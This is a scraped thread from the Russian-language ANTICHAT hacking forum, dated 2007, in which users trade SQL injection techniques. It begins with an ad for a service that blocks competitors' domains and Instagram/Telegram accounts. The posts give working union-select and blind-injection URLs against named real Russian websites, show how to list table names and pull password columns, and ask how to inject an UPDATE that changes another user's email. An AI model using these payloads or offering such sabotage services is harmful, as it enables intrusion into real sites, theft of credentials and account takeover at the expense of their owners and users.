УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ_OLD > Уязвимости
Ваши вопросы по уязвимостям.

Страница 34 из 1393

Опции темы

Поиск в этой теме

Опции просмотра

#331

21.11.2007, 18:58

v1ru$

Постоянный

Регистрация: 17.03.2007

Сообщений: 336

Провел на форуме:
3766085

Репутация: 576

Отправить сообщение для v1ru$ с помощью ICQ

Цитата:

Сообщение от ZAMUT

, (!ни один из них не выводится на экран!),

смотри исходник страницы,может там есть,и поставь - перед ?id=-1

#332

21.11.2007, 20:51

phol1eadeux

Участник форума

Регистрация: 07.08.2007

Сообщений: 139

Провел на форуме:
2063900

Репутация: 138

Цитата:

Сообщение от ZAMUT

ни один из них не выводится на экран

Не забывай про convert(), aes_decrypt(aes_encrypt())

#333

21.11.2007, 20:53

Spyder

Members of Antichat - Level 5

Регистрация: 09.10.2006

Сообщений: 1,698

Провел на форуме:
9098076

Репутация: 4303

Цитата:

Не забывай про convert(), aes_decrypt(aes_encrypt())

ога, ещё не забывай мыть руки перед едой
Скажи мне чем конверт и аес помогут ему в случае отсутствия принтабельных полей?

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

#334

23.11.2007, 21:31

Постоянный

Регистрация: 05.12.2004

Сообщений: 647

Провел на форуме:
1698585

Репутация: 818

Отправить сообщение для b3 с помощью ICQ

Народ подскажите мне можно ли при помощи посимвольного перебора подбирать название таблиц и колонок , иначе я непойму нафиг он тогда нужен ?

Цитата:

-http://www.teleset-ufa.ru/news.php?id=1+and+substring(user(),1,1)=0x74

юзер() и так же выводиться, нафига в мануалах учат на таком примере. Просьба не предлагать юзать перл скрипты для брута таблиц, один хрен если попадеться таблица с именем qwaszx_admin_zxewq её не сбрутиш. Заранее сенкс 8)

#335

23.11.2007, 21:48

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Это называется blind-inj, т.е. если допустим у тебя нет возможности вывести на страницу (увидеть) данные, то тебе придется использовать такие вот подзапросы и подбирать данные посимвольно, иногда бывает не возможно использовать union select, в таком случае опять же помогает использование подзапросов (таких вот логических операций)
, также это единственный способ использовать sql инъекцию после order by, да я понимаю долго и неудобно (хотя можно автоматизировать) но иногда (очень часто) это единственный способ получить данные из sql инъекции

если версия мускула 5 ветки, то можно подбирать имена таблиц и колонок таким способом, но это опять же получение данных с помощью подзапроса из определенного столбца и определенной таблицы

__________________
Карфаген должен быть разрушен...

Последний раз редактировалось Scipio; 23.11.2007 в 21:50..

#336

24.11.2007, 18:57

Mike 007

Познающий

Регистрация: 04.04.2007

Сообщений: 54

Провел на форуме:
189215

Репутация: 86

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*

я в этом деле новичок
для чего выкладывают u15691@10.10.10.205 и что оно даёт?
Что делать дальше? как узнать пароль\хеш админа? или юзверя какого нибудь?

#337

24.11.2007, 20:01

5taY3r

Познающий

Регистрация: 10.05.2007

Сообщений: 38

Провел на форуме:
453576

Репутация: 100

Цитата:

Сообщение от Mike 007

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,pass,user(),6,5+from+login/*

Дальше надо прочитать хоть пару статей про sql-inj....

Смотрим таблицы,далее колонки....и будет тебе счастье)

Код:

http://www.polimernm.ru/partner.php?pid=-1+union+select+1,TABLE_NAME,3,4,5+from+INFORMATION_SCHEMA.TABLES+limit+1,1/*

Последний раз редактировалось 5taY3r; 24.11.2007 в 20:08..

#338

24.11.2007, 20:16

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

2Extremal в твоем случае нет, это Mysql, при mysql-inj нельзя использовать две конструкции сразу, в MSSQL можно с помощью ;

2Mike 007 если такой запрос выдаст например root@10.10.10.205, то сразу открываются большие перспективы при использовании sql-inj

__________________
Карфаген должен быть разрушен...

#339

25.11.2007, 06:04

fervex

Новичок

Регистрация: 12.11.2007

Сообщений: 25

Провел на форуме:
36633

Репутация: 3

Здравствуйте!

Есть БД MySQL 5.0.27, уязвимая, кавычки использовать нельзя.
Вид такой:

Код:

.php?id=100+union+select+null,email,null+from+users+where+regID=5/*

Скажите, как к этой строке корректно добавить update+set или нечто подобное, чтобы у юзера с regID=5 изменить значение поля email?

Спасибо!

Последний раз редактировалось fervex; 25.11.2007 в 13:50..